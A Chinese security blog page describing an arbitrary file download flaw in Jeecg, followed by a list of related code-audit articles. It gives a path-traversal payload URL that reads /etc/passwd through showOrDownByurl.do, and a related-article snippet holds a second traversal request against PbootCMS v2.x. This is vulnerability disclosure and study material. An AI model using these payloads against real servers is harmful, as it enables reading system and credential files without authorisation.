Jeecg 任意文件下载漏洞

原創 灰色世界的阿信 2020-07-04 15:10

payload:
localhost:8080/jeecg_war/chat/imController/showOrDownByurl.do?dbPath=../../etc/passwd&down=1

它默认的文件路径是D://upFiles,我们部署在linux下把目录改为其他的任意目录,我这里修改为/tmp/uploads

在配置文件中进行修改(/src/main/resources/chat_config.properties)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

php代码审计之x-forwarded-for注入漏洞

前言: x-forwarded-for大家應該都不陌生,是用來獲取客戶端的ip地址的,在實際開發應用中也是非常廣泛的,今天這篇博客的主要內容就是x-forwarded-for注入xss代碼來獲得管理員cookie。 審計的源碼還是

cj_hydra 2020-07-05 14:17:12

LFI in PbootCMS v2.x

GET /pbootcms/index.php?search=&searchtpl=/....//....//....//....//....//....//etc/passwd HTTP/1.1 Host: localhost

灰色世界的阿信 2020-07-04 15:10:42

谈谈log4j的反序列化

文章發佈在安全客:https://www.anquanke.com/post/id/195932

灰色世界的阿信 2020-07-04 15:10:42

从安洵杯学习thinkphp 6.x反序列化POP链

前言 剛剛過去的安洵杯,裏面有一道iamthinking的題目(好像是這個名字吧),裏面考察到了tp6的反序列化(通過訪問www.zip可以下載源碼),按照慣例,我還是沒有做出來,我不知道咋繞過那個正則emmmm,給沒有做題的大師

灰色世界的阿信 2020-07-04 15:10:42

利用docker搭建php调试环境(phpstorm+xdebug)

前言 最近審計php代碼發現手動打印變量實在是太累了,不能快速的瞭解目標應用程序的運行邏輯。還是決定轉戰xdebug,下面是一些簡單的記錄…真香 docker環境獲取 爲什麼用docker來搭建調試環境呢?一是本地搭建比較麻煩,二

灰色世界的阿信 2020-07-04 15:10:42

代码审计Day1 – in_array函数缺陷

前言 大家好,我們是紅日安全-代碼審計小組。最近我們小組正在做一個PHP代碼審計的項目,供大家學習交流,我們給這個項目起了一個名字叫 PHP-Audit-Labs 。現在大家所看到的系列文章,屬於項目 第一階段 的內容,本階段的內容題目均

qq_27446553 2020-07-04 01:34:56

代码审计学习笔记

0x01 PHP核心配置講解 PHP_INI_*常量的定義 PHP_INI_USER 該配置可在用戶的PHP腳本或window註冊表設置 PHP_INI_PERDIR 該配置可在php.ini .htaccess或httpd.c

yida223 2020-07-03 18:56:29

代码审计:YCCMS 代码执行 文件上传 任意文件删除

代碼審計:YCCMS 代碼執行 文件上傳 任意文件刪除YCCMS審計準備代碼審計代碼執行漏洞文件上傳漏洞任意文件刪除漏洞 YCCMS YCCMS是一款PHP版輕量級CMS建站系統,程序頁面設計簡潔,生成靜態html,後臺功能強大,

CN_wanku 2020-07-01 17:44:04

代码审计:bluecms 前台comment.php注入复现

代碼審計:bluecms 前臺comment.php注入復現bluecms代碼審計漏洞復現 bluecms BlueCMS是一款專注於地方門戶網站建設解決方案,基於PHP+MySQL的技術開發,全部源碼開放。 復現版本爲bluec

CN_wanku 2020-07-01 17:44:04

代码审计:bluecms 用户注册xss漏洞复现

代碼審計:bluecms 用戶註冊xss漏洞復現bluecms代碼審計漏洞復現 bluecms BlueCMS是一款專注於地方門戶網站建設解決方案,基於PHP+MySQL的技術開發,全部源碼開放。 復現版本爲bluecmsv1.6

CN_wanku 2020-07-01 17:44:04

代码审计:beescms 登录框注入复现

代碼審計:beescms 登錄框注入復現beescms環境搭建代碼審計漏洞利用 beescms BEESCMS企業網站管理系統,SEO優化更快,無功能限制,後臺上手容易,各類行業模板供選擇使用!全面支持手機網站,電腦手機模板標籤全

CN_wanku 2020-07-01 17:44:04

代码审计:bugkuCTF web进阶 bugku导航两处注入

代碼審計:bugkuCTF web進階 bugku導航兩處注入bugku導航代碼審計/member/add.php 存在注入/member/admin.php 存在注入 bugku導航 bugku導航是bugkuCTF靶場中,we

CN_wanku 2020-07-01 17:44:04

代码审计:bluecms 前台ad_js.php注入复现

代碼審計:bluecms 前臺ad_js.php注入復現bluecms代碼審計漏洞復現 bluecms BlueCMS是一款專注於地方門戶網站建設解決方案,基於PHP+MySQL的技術開發,全部源碼開放。 復現版本爲bluecms

CN_wanku 2020-07-01 17:44:04

一篇文章读懂Java代码审计之XXE

前言 學習總結Java審計過程中筆記,審計方法 閱讀要求:有簡單Java代碼基礎,瞭解漏洞原理 閱讀時長:30min 篇幅比較長 漏洞簡介    簡單來說,XXE就是XML外部實體注入。當允許引用外部實體時,通過構造惡意內容

明月清水 2020-06-29 11:10:21

代码审计--32--NodeJS代码审计中常见的漏洞(一)

經過漫長時間的迭代更新,內容從一開始的碎片化網羅蒐集,到排版與整合劃分,再到學習與實踐驗證,最後摒棄初始,用自己的語言與實踐結論通俗的將它展現出來。強化知識技能的同時也爲讀者帶來更好的閱讀體驗。 本篇介紹了以下代碼安全問題: 編號

随 亦 2020-06-28 00:33:32